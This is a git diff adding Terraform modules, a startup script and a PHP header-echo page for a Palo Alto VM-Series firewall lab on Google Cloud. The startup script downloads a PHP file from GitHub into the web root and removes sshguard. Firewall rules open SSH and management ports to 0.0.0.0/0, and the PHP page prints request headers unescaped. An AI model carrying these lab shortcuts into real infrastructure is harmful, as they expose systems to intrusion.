--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vm/outputs.tf
@@ -0,0 +1,7 @@
+output vm_names {
+  value = google_compute_instance.default.*.name
+}
+
+output vm_self_link {
+  value = google_compute_instance.default.*.self_link
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vm/variables.tf b/gcp/ilbnh-mig/modules/vm/variables.tf
new file mode 100644
index 00000000..76b51bf5
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vm/variables.tf
@@ -0,0 +1,44 @@
+variable names {
+  type = list(string)
+}
+
+variable machine_type {
+}
+
+variable zones {
+  type = list(string)
+}
+variable ssh_key {
+  default = ""
+}
+variable image {
+}
+
+variable subnetworks {
+  type = list(string)
+}
+
+variable server_ips {
+  type = list(string)
+}
+
+variable scopes {
+  type = list(string)
+
+  default = [
+    "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+    "https://www.googleapis.com/auth/devstorage.read_only",
+    "https://www.googleapis.com/auth/logging.write",
+    "https://www.googleapis.com/auth/monitoring.write",
+  ]
+}
+
+variable startup_script {
+  default = ""
+}
+
+variable server_public_ip {
+  type    = bool
+  default = false
+}
+
diff --git a/gcp/ilbnh-mig/modules/vmseries/main.tf b/gcp/ilbnh-mig/modules/vmseries/main.tf
new file mode 100644
index 00000000..0b78dd00
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vmseries/main.tf
@@ -0,0 +1,84 @@
+resource "google_compute_instance_template" "vmseries" {
+  name                      = "vmseries-template"
+  description               = "This template is used to create firewall instances."
+  instance_description      = "VM-Series for ILBNH"
+  region                    = var.region
+  machine_type              = var.machine_type
+  min_cpu_platform          = var.cpu_platform
+  can_ip_forward            = true
+  tags                      = var.tags
+  
+  scheduling {
+    automatic_restart   = true
+    on_host_maintenance = "MIGRATE"
+  }
+
+  metadata = {
+    mgmt-interface-swap                  = var.mgmt_interface_swap
+    vmseries-bootstrap-gce-storagebucket = var.bootstrap_bucket
+    serial-port-enable                   = true
+    ssh-keys                             = var.ssh_key
+  }
+
+  service_account {
+    scopes = var.scopes
+  }
+
+  network_interface {
+
+    dynamic "access_config" {
+      for_each = var.nic0_public_ip ? [""] : []
+      content {}
+    }
+    subnetwork = var.subnetworks[0]
+  }
+
+  network_interface {
+    dynamic "access_config" {
+      for_each = var.nic1_public_ip ? [""] : []
+      content {}
+    }
+    subnetwork = var.subnetworks[1]
+  }
+
+  network_interface {
+    dynamic "access_config" {
+      for_each = var.nic2_public_ip ? [""] : []
+      content {}
+    }
+    subnetwork = var.subnetworks[2]
+  }
+
+  network_interface {
+    dynamic "access_config" {
+      for_each = var.nic3_public_ip ? [""] : []
+      content {}
+    }
+    subnetwork = var.subnetworks[3]
+  }
+
+  disk {
+      source_image = var.image
+      type         = var.disk_type
+  }
+
+  lifecycle {
+    create_before_destroy = "true"
+  }
+}
+
+resource "google_compute_region_instance_group_manager" "vmseries_rigm" {
+  name               = "vmseries-rigm"
+  base_instance_name = var.base_name
+  region             = var.region
+  target_size        = var.target_size
+
+  version {
+    instance_template  = google_compute_instance_template.vmseries.self_link
+  }
+
+  named_port {
+    name = "http"
+    port = "80"
+  }
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vmseries/outputs.tf b/gcp/ilbnh-mig/modules/vmseries/outputs.tf
new file mode 100644
index 00000000..11bd3b53
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vmseries/outputs.tf
@@ -0,0 +1,3 @@
+output vmseries_rigm {
+  value = google_compute_region_instance_group_manager.vmseries_rigm.instance_group
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vmseries/variables.tf b/gcp/ilbnh-mig/modules/vmseries/variables.tf
new file mode 100644
index 00000000..271a7b55
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vmseries/variables.tf
@@ -0,0 +1,121 @@
+variable networks {
+  type = list(string)
+}
+
+variable subnetworks {
+  type = list(string)
+}
+
+variable base_name {
+}
+
+variable machine_type {
+}
+
+variable region {
+}
+
+variable zones {
+  type = list(string)
+}
+
+variable cpu_platform {
+  default = "Intel Broadwell"
+}
+variable disk_type {
+  default = "pd-ssd"
+}
+variable bootstrap_bucket {
+  default = ""
+}
+
+variable ssh_key {
+  default = ""
+}
+
+variable public_lb_create {
+  default = false
+}
+
+variable target_size {
+  default = "1"
+}
+
+variable scopes {
+  type = list(string)
+
+  default = [
+    "https://www.googleapis.com/auth/compute.readonly",
+    "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+    "https://www.googleapis.com/auth/devstorage.read_only",
+    "https://www.googleapis.com/auth/logging.write",
+    "https://www.googleapis.com/auth/monitoring.write",
+  ]
+}
+
+variable image {
+}
+
+variable tags {
+  type    = list(string)
+  default = []
+}
+
+variable create_instance_group {
+  type    = bool
+  default = false
+}
+
+variable instance_group_names {
+  type    = list(string)
+  default = ["vmseries-instance-group"]
+}
+
+variable dependencies {
+  type    = list(string)
+  default = []
+}
+
+variable mgmt_interface_swap {
+  default = ""
+}
+
+variable nic0_ip {
+  type    = list(string)
+  default = [""]
+}
+
+variable nic1_ip {
+  type    = list(string)
+  default = [""]
+}
+
+variable nic2_ip {
+  type    = list(string)
+  default = [""]
+}
+
+variable nic3_ip {
+  type    = list(string)
+  default = [""]
+}
+
+variable nic0_public_ip {
+  type    = bool
+  default = false
+}
+
+variable nic1_public_ip {
+  type    = bool
+  default = false
+}
+
+variable nic2_public_ip {
+  type    = bool
+  default = false
+}
+
+variable nic3_public_ip {
+  type    = bool
+  default = false
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vpc/main.tf b/gcp/ilbnh-mig/modules/vpc/main.tf
new file mode 100644
index 00000000..6c681d08
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vpc/main.tf
@@ -0,0 +1,25 @@
+resource "google_compute_network" "default" {
+  name                            = var.vpc
+  delete_default_routes_on_create = var.delete_default_route
+  auto_create_subnetworks         = false
+}
+
+resource "google_compute_subnetwork" "default" {
+  name          = var.subnet
+  ip_cidr_range = var.cidr
+  region        = var.region
+  network       = google_compute_network.default.self_link
+}
+
+resource "google_compute_firewall" "default" {
+  count         = length(var.allowed_sources) != 0 ? 1 : 0
+  name          = "${google_compute_network.default.name}-ingress"
+  network       = google_compute_network.default.self_link
+  direction     = "INGRESS"
+  source_ranges = var.allowed_sources
+
+  allow {
+    protocol = var.allowed_protocol
+    ports    = var.allowed_ports
+  }
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vpc/outputs.tf b/gcp/ilbnh-mig/modules/vpc/outputs.tf
new file mode 100644
index 00000000..dbf7ed78
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vpc/outputs.tf
@@ -0,0 +1,29 @@
+output network_self_link {
+#  value = google_compute_network.default.*.self_link
+  value = google_compute_network.default.self_link
+}
+
+output subnetwork_id {
+  value = google_compute_subnetwork.default.*.id
+}
+
+output subnetwork_name {
+  value = google_compute_subnetwork.default.*.name
+}
+
+output subnetwork_self_link {
+#  value = google_compute_subnetwork.default.*.self_link
+  value = google_compute_subnetwork.default.self_link
+}
+
+output vpc_name {
+  value = google_compute_network.default.*.name
+}
+
+output vpc_id {
+  value = google_compute_network.default.*.id[0]
+}
+
+output vpc_self_link {
+  value = google_compute_network.default.*.self_link[0]
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vpc/variables.tf b/gcp/ilbnh-mig/modules/vpc/variables.tf
new file mode 100644
index 00000000..04407a0d
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vpc/variables.tf
@@ -0,0 +1,29 @@
+variable vpc {
+}
+
+variable subnet {
+}
+
+variable cidr {
+}
+
+variable region {
+}
+
+variable allowed_sources {
+  type    = list(string)
+  default = []
+}
+
+variable allowed_protocol {
+  default = "all"
+}
+
+variable allowed_ports {
+  type    = list(string)
+  default = []
+}
+
+variable delete_default_route {
+  default = "false"
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/project.tf b/gcp/ilbnh-mig/project.tf
new file mode 100644
index 00000000..a65b533f
--- /dev/null
+++ b/gcp/ilbnh-mig/project.tf
@@ -0,0 +1,15 @@
+terraform {
+  required_version = ">= 0.12"
+}
+
+provider "google" {
+  credentials = var.auth_file
+  project     = var.project_id
+  region      = var.region
+}
+
+provider "google-beta" {
+  version     = "> 2.50.0"
+}
+
+data "google_compute_zones" "available" {}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/scripts/showheaders.php b/gcp/ilbnh-mig/scripts/showheaders.php
new file mode 100644
index 00000000..19c37318
--- /dev/null
+++ b/gcp/ilbnh-mig/scripts/showheaders.php
@@ -0,0 +1,62 @@
+<?php
+function microtime_float()
+{
+    list($usec, $sec) = explode(" ", microtime());
+    return ((float)$usec + (float)$sec);
+}
+
+$time_start = microtime_float();
+
+// Sleep for a while
+usleep(100);
+
+$time_end = microtime_float();
+$time = $time_end - $time_start;
+function getRealIpAddr()
+{
+    if (!empty($_SERVER['HTTP_CLIENT_IP']))   //check ip from share internet
+    {
+      $ip=$_SERVER['HTTP_CLIENT_IP'];
+    }
+    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))   //to check ip is pass from proxy
+    {
+      $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
+    }
+    else
+    {
+      $ip=$_SERVER['REMOTE_ADDR'];
+    }
+    return $ip;
+}
+echo '<b style="color: red">
+      SOURCE & DESTINATION ADDRESSES
+      </b></br> ';
+echo '<strong>'. "INTERVAL" .'</strong>: '. $time .'<br />';
+$localIPAddress = getHostByName(getHostName());
+$sourceIPAddress = getRealIpAddr();
+echo '<strong>'. "SOURCE IP" .'</strong>: '. $sourceIPAddress .'<br />';
+echo '<strong>'. "LOCAL  IP" .'</strong>: '. $localIPAddress .'<br />';
+
+$vm_name = gethostname();
+echo '<strong>'. "VM NAME" .'</strong>: '. $vm_name .'<br />';
+echo ''. '<br />';
+echo '<b style="color: blue">
+      HEADER INFORMATION
+      </b></br> ';
+/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */
+foreach ($_SERVER as $header => $value) {
+  if (substr($header, 0, 5) == 'HTTP_') {
+    /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */
+    $clean_header = strtolower(substr($header, 5, strlen($header)));
+
+    /* Replace underscores by the dashes, as the browser sends them */
+    $clean_header = str_replace('_', '-', $clean_header);
+
+    /* Cleanup: standard headers are first-letter uppercase */
+    $clean_header = ucwords($clean_header, " \t\r\n\f\v-");
+
+    /* And show'm */
+    echo '<strong>'. $header .'</strong>: '. $value .'<br />';
+  }
+}
+?>
diff --git a/gcp/ilbnh-mig/scripts/webserver-startup.sh b/gcp/ilbnh-mig/scripts/webserver-startup.sh
new file mode 100644
index 00000000..a19aefe9
--- /dev/null
+++ b/gcp/ilbnh-mig/scripts/webserver-startup.sh
@@ -0,0 +1,9 @@
+#!/bin/bash
+until sudo apt-get update; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y apache2; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y libapache2-mod-php; do echo "Retrying"; sleep 2; done
+until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done
+until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done
+until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done
+until sudo apt-get autoremove -y --purge sshguard; do echo "Retrying"; sleep 2; done
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/servers.tf b/gcp/ilbnh-mig/servers.tf
new file mode 100644
index 00000000..fe563ba5
--- /dev/null
+++ b/gcp/ilbnh-mig/servers.tf
@@ -0,0 +1,29 @@
+#-----------------------------------------------------------------------------------------------
+# Create N webservers in one subnet. N is determined by the number of hostnames in the list
+module "server1" {
+  source                = "./modules/vm/"
+  names                 = var.server1_vms
+  zones                 = [data.google_compute_zones.available.names[0]]
+  subnetworks           = [module.vpc0.subnetwork_self_link]
+  server_ips            = var.server1_ips
+  server_public_ip      = var.server_public_ip
+  machine_type          = var.server_size
+  image                 = var.server_image
+  ssh_key               = fileexists(var.public_key_path) ? "${var.server_user}:${file(var.public_key_path)}" : ""
+  startup_script        = file("${path.module}/scripts/webserver-startup.sh")
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create X webservers in another subnet. X is determined by the number of hostnames in the list
+module "server2" {
+  source                = "./modules/vm/"
+  names                 = var.server2_vms
+  zones                 = [data.google_compute_zones.available.names[0]]
+  subnetworks           = [module.vpc2.subnetwork_self_link]
+  server_ips            = var.server2_ips
+  server_public_ip      = var.server_public_ip
+  machine_type          = var.server_size
+  image                 = var.server_image
+  ssh_key               = fileexists(var.public_key_path) ? "${var.server_user}:${file(var.public_key_path)}" : ""
+  startup_script        = file("${path.module}/scripts/webserver-startup.sh")
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/terraform.tfvars b/gcp/ilbnh-mig/terraform.tfvars
new file mode 100644
index 00000000..31dd7687
--- /dev/null
+++ b/gcp/ilbnh-mig/terraform.tfvars
@@ -0,0 +1,48 @@
+project_id      = "<GCP Project ID>"
+auth_file       = "<Path to JSON Auth File>"
+public_key_path = "<Path to SSH key>"   # Your SSH Key
+
+#fw_panos        = "byol-904"              # Uncomment for PAN-OS 9.0.4 - BYOL
+fw_panos        = "bundle1-904"           # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 1
+#fw_panos        = "bundle2-904"           # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 2
+
+
+#-------------------------------------------------------------------
+region          = "us-central1"
+
+vpc0            = "testing"
+vpc0_subnet     = "testing-subnet"
+vpc0_cidr       = "10.30.1.0/24"
+
+vpc1            = "mgmt"
+vpc1_subnet     = "mgmt-subnet"
+vpc1_cidr       = "10.60.1.0/24"
+
+vpc2            = "production"
+vpc2_subnet     = "production-subnet"
+vpc2_cidr       = "10.50.1.0/24"
+
+vpc3            = "production2"
+vpc3_subnet     = "production2-subnet"
+vpc3_cidr       = "10.40.1.0/24"
+
+fw_base_name    = "vmseries"
+fw_machine_type = "n1-standard-4"
+target_size     = "1"
+
+mgmt_sources    = ["0.0.0.0/0"]
+health_check_port = "22"
+all_ports         = true
+
+server_user       = "demo"
+server_size       = "f1-micro"
+server_image      = "ubuntu-os-cloud/ubuntu-1604-lts"
+server_public_ip  = true
+server1_vms       = ["testing-vm"]
+server1_ips       = ["10.30.1.100"]
+
+server2_vms       = ["production-vm"]
+server2_ips       = ["10.50.1.100"]
+
+ilb1_ip           = "10.30.1.99"
+ilb2_ip           = "10.50.1.99"
diff --git a/gcp/ilbnh-mig/variables.tf b/gcp/ilbnh-mig/variables.tf
new file mode 100644
index 00000000..98a46495
--- /dev/null
+++ b/gcp/ilbnh-mig/variables.tf
@@ -0,0 +1,122 @@
+variable project_id {
+  description = "GCP Project ID"
+}
+
+variable auth_file {
+  description = "GCP Project auth file"
+  default     = ""
+}
+
+variable region {
+}
+
+variable fw_panos {
+  description = "VM-Series license and PAN-OS (ie: bundle1-814, bundle2-814, or byol-814)"
+}
+
+variable fw_image {
+  default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries"
+}
+
+variable fw_base_name {
+}
+
+variable target_size {
+}
+
+variable fw_machine_type {
+}
+
+variable mgmt_sources {
+  type = list(string)
+}
+
+variable health_check_port {
+  description = "Port the ILB will health check"
+  default     = "22"
+}
+
+variable all_ports {
+  description = "Enable all ports on the ILB"
+  default     = true
+}
+variable vpc1 {
+}
+
+variable vpc1_subnet {
+}
+
+variable vpc1_cidr {
+}
+
+variable vpc0 {
+}
+
+variable vpc0_subnet {
+}
+
+variable vpc0_cidr {
+}
+
+variable vpc2 {
+}
+
+variable vpc2_subnet {
+}
+
+variable vpc2_cidr {
+}
+
+variable vpc3 {
+}
+
+variable vpc3_subnet {
+}
+
+variable vpc3_cidr {
+}
+
+variable server1_vms {
+  type = list(string)
+}
+
+variable server1_ips {
+  type = list(string)
+}
+
+variable server2_vms {
+  type = list(string)
+}
+
+variable server_user {
+  description = "SSH user for Linux VM"
+}
+
+variable server2_ips {
+  type = list(string)
+}
+
+variable server_size {
+  description = "Machine size for the server VMs"
+}
+
+variable server_image {
+  description = "OS image for server installation"
+}
+
+variable server_public_ip {
+  description = "Should we assign a public IP to the server"
+  default     = false
+}
+
+variable public_key_path {
+  description = "Local path to public SSH key.  If you do not have a public key, run >> ssh-keygen -f ~/.ssh/demo-key -t rsa -C admin"
+}
+
+variable ilb1_ip {
+  description = "IP address for ILB1"
+}
+
+variable ilb2_ip {
+  description = "IP address for ILB2"
+}
diff --git a/gcp/k8s-Prisma-API/.gitignore b/gcp/k8s-Prisma-API/.gitignore
new file mode 100644
index 00000000..8d51dd09
--- /dev/null
+++ b/gcp/k8s-Prisma-API/.gitignore
@@ -0,0 +1,2 @@
+# pycharm
+.DS_Store
diff --git a/gcp/k8s-Prisma-API/.meta-cnc.yaml b/gcp/k8s-Prisma-API/.meta-cnc.yaml
new file mode 100644
index 00000000..e651d353
--- /dev/null
+++ b/gcp/k8s-Prisma-API/.meta-cnc.yaml
@@ -0,0 +1,43 @@
+name: gke_k8s_EW_inspection
+
+# label should be a human readable label that conveys what this skillet will do
+label: GCP 4-node k8s cluster with VM-Series Firewall
+
+description: This skillet deploys a 4-node GCP k8s cluster with a VM-Series Firewall for both N/S and E/W Inspection. This is the base deployment used in the Ignite 19 k8s HOW lab.  There is also a guide that walks through deploying a 2 tier container application and Prisma Public Cloud API scanning.
+
+# type instructs Panhandler how to consume this skillet
+type: terraform
+
+# extends allows you to include other skillets along with this one
+extends:
+
+# labels allow extensible configuration options per skillet type. For example, lables can be used to
+# group multiple skillets of the same type (pan-os skillets labeled as version: 9.0 for example)
+labels:
+  collection: GCP K8s Prisma API
+
+
+# Variables will be presented to the user via the Panhandler GUI. These values will then be passed to
+# the terraform binary as '--var' options, thus overriding any tfvars entries.
+# Variable names MUST match the names of the defined terraform variables
+variables:
+  - name: container-ver
+    description: GCP Container Ver
+    default: 1.11.10-gke.4
+    type_hint: gcloud container get-server-config --zone us-central1
+  - name: my_gcp_project
+    description: GCP Project
+    default: djs-gcp-2018
+    type_hint: project id
+  - name: region
+    description: GCP Region
+    default: us-central1
+    type_hint: text
+  - name: zone
+    description: GCP Zone
+    default: us-central1-a
+    type_hint: text
+  - name: credentials_file_path
+    description: Path to the JSON file used to describe your account credentials
+    default: djs-gcp-2018-creds.json
+    type_hint: text
diff --git a/gcp/k8s-Prisma-API/LICENSE b/gcp/k8s-Prisma-API/LICENSE
new file mode 100644
index 00000000..261eeb9e
--- /dev/null
+++ b/gcp/k8s-Prisma-API/LICENSE
@@ -0,0 +1,201 @@
+                                 Apache License
+                           Version 2.0, January 2004
+                        http://www.apache.org/licenses/
+
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+      "License" shall mean the terms and conditions for use, reproduction,
+      and distribution as defined by Sections 1 through 9 of this document.
+
+      "Licensor" shall mean the copyright owner or entity authorized by
+      the copyright owner that is granting the License.
+
+      "Legal Entity" shall mean the union of the acting entity and all
+      other entities that control, are controlled by, or are under common
+      control with that entity. For the purposes of this definition,
+      "control" means (i) the power, direct or indirect, to cause the
+      direction or management of such entity, whether by contract or
+      otherwise, or (ii) ownership of fifty percent (50%) or more of the
+      outstanding shares, or (iii) beneficial ownership of such entity.
+
+      "You" (or "Your") shall mean an individual or Legal Entity
+      exercising permissions granted by this License.
+
+      "Source" form shall mean the preferred form for making modifications,
+      including but not limited to software source code, documentation
+      source, and configuration files.
+
+      "Object" form shall mean any form resulting from mechanical
+      transformation or translation of a Source form, including but
+      not limited to compiled object code, generated documentation,
+      and conversions to other media types.
+
+      "Work" shall mean the work of authorship, whether in Source or
+      Object form, made available under the License, as indicated by a
+      copyright notice that is included in or attached to the work
+      (an example is provided in the Appendix below).
+
+      "Derivative Works" shall mean any work, whether in Source or Object
+      form, that is based on (or derived from) the Work and for which the
+      editorial revisions, annotations, elaborations, or other modifications
+      represent, as a whole, an original work of authorship. For the purposes
+      of this License, Derivative Works shall not include works that remain
+      separable from, or merely link (or bind by name) to the interfaces of,
+      the Work and Derivative Works thereof.
+
+      "Contribution" shall mean any work of authorship, including
+      the original version of the Work and any modifications or additions
+      to that Work or Derivative Works thereof, that is intentionally
+      submitted to Licensor for inclusion in the Work by the copyright owner
+      or by an individual or Legal Entity authorized to submit on behalf of
+      the copyright owner. For the purposes of this definition, "submitted"
+      means any form of electronic, verbal, or written communication sent
+      to the Licensor or its representatives, including but not limited to
+      communication on electronic mailing lists, source code control systems,
+      and issue tracking systems that are managed by, or on behalf of, the
+      Licensor for the purpose of discussing and improving the Work, but
+      excluding communication that is conspicuously marked or otherwise
+      designated in writing by the copyright owner as "Not a Contribution."
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity
+      on behalf of whom a Contribution has been received by Licensor and
+      subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      copyright license to reproduce, prepare Derivative Works of,
+      publicly display, publicly perform, sublicense, and distribute the
+      Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      (except as stated in this section) patent license to make, have made,
+      use, offer to sell, sell, import, and otherwise transfer the Work,
+      where such license applies only to those patent claims licensable
+      by such Contributor that are necessarily infringed by their
+      Contribution(s) alone or by combination of their Contribution(s)
+      with the Work to which such Contribution(s) was submitted. If You
+      institute patent litigation against any entity (including a
+      cross-claim or counterclaim in a lawsuit) alleging that the Work
+      or a Contribution incorporated within the Work constitutes direct
+      or contributory patent infringement, then any patent licenses
+      granted to You under this License for that Work shall terminate
+      as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the
+      Work or Derivative Works thereof in any medium, with or without
+      modifications, and in Source or Object form, provided that You
+      meet the following conditions:
+
+      (a) You must give any other recipients of the Work or
+          Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices
+          stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works
+          that You distribute, all copyright, patent, trademark, and
+          attribution notices from the Source form of the Work,
+          excluding those notices that do not pertain to any part of
+          the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its
+          distribution, then any Derivative Works that You distribute must
+          include a readable copy of the attribution notices contained
+          within such NOTICE file, excluding those notices that do not
+          pertain to any part of the Derivative Works, in at least one
+          of the following places: within a NOTICE text file distributed
+          as part of the Derivative Works; within the Source form or
+          documentation, if provided along with the Derivative Works; or,
+          within a display generated by the Derivative Works, if and
+          wherever such third-party notices normally appear. The contents
+          of the NOTICE file are for informational purposes only and
+          do not modify the License. You may add Your own attribution
+          notices within Derivative Works that You distribute, alongside
+          or as an addendum to the NOTICE text from the Work, provided
+          that such additional attribution notices cannot be construed
+          as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and
+      may provide additional or different license terms and conditions
+      for use, reproduction, or distribution of Your modifications, or
+      for any such Derivative Works as a whole, provided Your use,
+      reproduction, and distribution of the Work otherwise complies with
+      the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise,
+      any Contribution intentionally submitted for inclusion in the Work
+      by You to the Licensor shall be under the terms and conditions of
+      this License, without any additional terms or conditions.
+      Notwithstanding the above, nothing herein shall supersede or modify
+      the terms of any separate license agreement you may have executed
+      with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade
+      names, trademarks, service marks, or product names of the Licensor,
+      except as required for reasonable and customary use in describing the
+      origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or
+      agreed to in writing, Licensor provides the Work (and each
+      Contributor provides its Contributions) on an "AS IS" BASIS,
+      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+      implied, including, without limitation, any warranties or conditions
+      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+      PARTICULAR PURPOSE. You are solely responsible for determining the
+      appropriateness of using or redistributing the Work and assume any
+      risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory,
+      whether in tort (including negligence), contract, or otherwise,
+      unless required by applicable law (such as deliberate and grossly
+      negligent acts) or agreed to in writing, shall any Contributor be
+      liable to You for damages, including any direct, indirect, special,
+      incidental, or consequential damages of any character arising as a
+      result of this License or out of the use or inability to use the
+      Work (including but not limited to damages for loss of goodwill,
+      work stoppage, computer failure or malfunction, or any and all
+      other commercial damages or losses), even if such Contributor
+      has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing
+      the Work or Derivative Works thereof, You may choose to offer,
+      and charge a fee for, acceptance of support, warranty, indemnity,
+      or other liability obligations and/or rights consistent with this
+      License. However, in accepting such obligations, You may act only
+      on Your own behalf and on Your sole responsibility, not on behalf
+      of any other Contributor, and only if You agree to indemnify,
+      defend, and hold each Contributor harmless for any liability
+      incurred by, or claims asserted against, such Contributor by reason
+      of your accepting any such warranty or additional liability.
+
+   END OF TERMS AND CONDITIONS
+
+   APPENDIX: How to apply the Apache License to your work.
+
+      To apply the Apache License to your work, attach the following
+      boilerplate notice, with the fields enclosed by brackets "[]"
+      replaced with your own identifying information. (Don't include
+      the brackets!)  The text should be enclosed in the appropriate
+      comment syntax for the file format. We also recommend that a
+      file or class name and description of purpose be included on the
+      same "printed page" as the copyright notice for easier
+      identification within third-party archives.
+
+   Copyright [yyyy] [name of copyright owner]
+
+   Licensed under the Apache License, Version 2.0 (the "License");
+   you may not use this file except in compliance with the License.
+   You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing, software
+   distributed under the License is distributed on an "AS IS" BASIS,
+   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+   See the License for the specific language governing permissions and
+   limitations under the License.
diff --git a/gcp/k8s-Prisma-API/Main.tf b/gcp/k8s-Prisma-API/Main.tf
new file mode 100644
index 00000000..92932bc5
--- /dev/null
+++ b/gcp/k8s-Prisma-API/Main.tf
@@ -0,0 +1,358 @@
+provider "google" {
+  credentials = "${file(var.credentials_file_path)}"
+  project     = "${var.my_gcp_project}"
+  region      = "${var.region}"
+}
+
+// Adding SSH Public Key Project Wide
+resource "google_compute_project_metadata_item" "ssh-keys" {
+  key   = "ssh-keys"
+  value = "${var.gce_ssh_user}:${var.gce_ssh_pub_key}"
+}
+
+// Adding VPC Networks to Project  MANAGEMENT
+resource "google_compute_subnetwork" "management-sub" {
+  name          = "management-sub"
+  ip_cidr_range = "10.5.0.0/24"
+  network       = "${google_compute_network.management.self_link}"
+  region        = "${var.region}"
+}
+
+resource "google_compute_network" "management" {
+  name                    = "${var.interface_0_name}"
+  auto_create_subnetworks = "false"
+}
+
+// Adding VPC Networks to Project  UNTRUST
+resource "google_compute_subnetwork" "untrust-sub" {
+  name          = "untrust-sub"
+  ip_cidr_range = "10.5.1.0/24"
+  network       = "${google_compute_network.untrust.self_link}"
+  region        = "${var.region}"
+}
+
+resource "google_compute_network" "untrust" {
+  name                    = "${var.interface_1_name}"
+  auto_create_subnetworks = "false"
+}
+
+// Adding VPC Networks to Project  TRUST
+resource "google_compute_subnetwork" "trust-sub" {
+  name          = "trust-sub"
+  ip_cidr_range = "10.5.2.0/24"
+  network       = "${google_compute_network.trust.self_link}"
+  region        = "${var.region}"
+}
+
+resource "google_compute_network" "trust" {
+  name                    = "${var.interface_2_name}"
+  auto_create_subnetworks = "false"
+}
+
+// Adding GCP Outbound Route to TRUST Interface
+resource "google_compute_route" "trust" {
+  name                   = "trust-route"
+  dest_range             = "0.0.0.0/0"
+  network                = "${google_compute_network.trust.self_link}"
+  next_hop_instance      = "${element(google_compute_instance.firewall.*.name,count.index)}"
+  next_hop_instance_zone = "${var.zone}"
+  priority               = 100
+
+  depends_on = ["google_compute_instance.firewall",
+    "google_compute_network.trust",
+    "google_compute_network.untrust",
+    "google_compute_network.management",
+    "google_container_cluster.cluster",
+    "google_compute_instance.firewall",
+    "google_container_node_pool.db_nodes",
+  ]
+}
+
+// Adding GCP Route to Cluster MGMT Endpoint
+resource "google_compute_route" "k8mgmt" {
+  name             = "cluster-endpoint-route"
+  dest_range       = "${element(google_container_cluster.cluster.*.endpoint,count.index)}/32"
+  network          = "${google_compute_network.trust.self_link}"
+  next_hop_gateway = "default-internet-gateway"
+  priority         = 100
+
+  depends_on = ["google_compute_instance.firewall",
+    "google_compute_network.trust",
+    "google_compute_network.untrust",
+    "google_compute_network.management",
+    "google_container_cluster.cluster",
+    "google_compute_instance.firewall",
+    "google_container_node_pool.db_nodes",
+  ]
+}
+
+// Adding GCP Firewall Rules for MANGEMENT
+resource "google_compute_firewall" "allow-mgmt" {
+  name    = "allow-mgmt"
+  network = "${google_compute_network.management.self_link}"
+
+  allow {
+    protocol = "icmp"
+  }
+
+  allow {
+    protocol = "tcp"
+    ports    = ["443", "22"]
+  }
+
+  source_ranges = ["0.0.0.0/0"]
+}
+
+// Adding GCP Firewall Rules for INBOUND
+resource "google_compute_firewall" "allow-inbound" {
+  name    = "allow-inbound"
+  network = "${google_compute_network.untrust.self_link}"
+
+  allow {
+    protocol = "tcp"
+    ports    = ["80", "22", "8888"]
+  }
+
+  source_ranges = ["0.0.0.0/0"]
+}
+
+// Adding GCP Firewall Rules for OUTBOUND
